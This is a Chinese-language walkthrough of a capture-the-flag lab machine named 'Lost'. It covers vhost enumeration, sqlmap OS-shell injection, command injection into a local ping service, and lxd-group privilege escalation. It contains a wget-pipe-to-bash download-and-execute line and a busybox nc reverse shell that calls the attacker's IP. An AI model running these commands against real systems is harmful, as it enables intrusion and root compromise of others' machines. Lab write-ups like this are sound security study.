# 靶场搭建

下载:Lost

Nat,IP: 192.168.1.174

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_  256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: lost.nyx
|_http-server-header: Apache/2.4.57 (Debian)

80 口提示域名爆破

┌──(root㉿kali)-[~]
└─# gobuster vhost -u lost.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://lost.nyx
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.lost.nyx Status: 200 [Size: 9936]
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================

添加到 host,看一眼 dev.lost.nyx

翻一下,直接拿下: sqlmap -u http://dev.lost.nyx/passengers.php?id=1 --os-shell --batch

shel 弹出来

os-shell> wget -O - http://192.168.1.129:8000/shell.sh|bash
do you want to retrieve the command standard output? [Y/n/a] Y
No output

# 提权

pe -ef 发现有个用户开了个 3000 的 web 服务,需要穿透传出来,我直接在服务器上搞

curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1'

看到 ping 的数据,尝试 RCE: curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1|id' 发现 jackshephard

弹出来 shell: curl 'http://127.0.0.1:3000/' -X POST --data-raw 'ip=127.0.0.1|busybox${IFS}nc${IFS}192.168.1.129${IFS}4444${IFS}-e${IFS}bash'

拿到权限

id 发现存在 lxd 组,那么可以利用

如果我们的用户有 lxd 组,我们可以部署容器(一台机器)以 root 身份升级权限,这样我们就可以将当前操作系统的整个根目录 “/”(主机)挂载→ /mnt/root(容器)。然后,一旦创建,我们将拥有对所有文件的 root 访问权限,这些文件,文件夹 / 以前我们无法读取 / 创建 / 修改。

# 攻击机进行
wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
sudo bash build-alpine
# 受害机进行
1. lxc image import 生成的tar.gz --alias alpine # importamos la imagen
2. lxc image list # listamos la imagen para ver que se haya creado
3. lxc init alpine privesc -c security.privileged=true 
4. lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true # ponemos que la / raiz este en /mnt/root
5. lxc start privesc
6. lxc exec privesc sh

拿到权限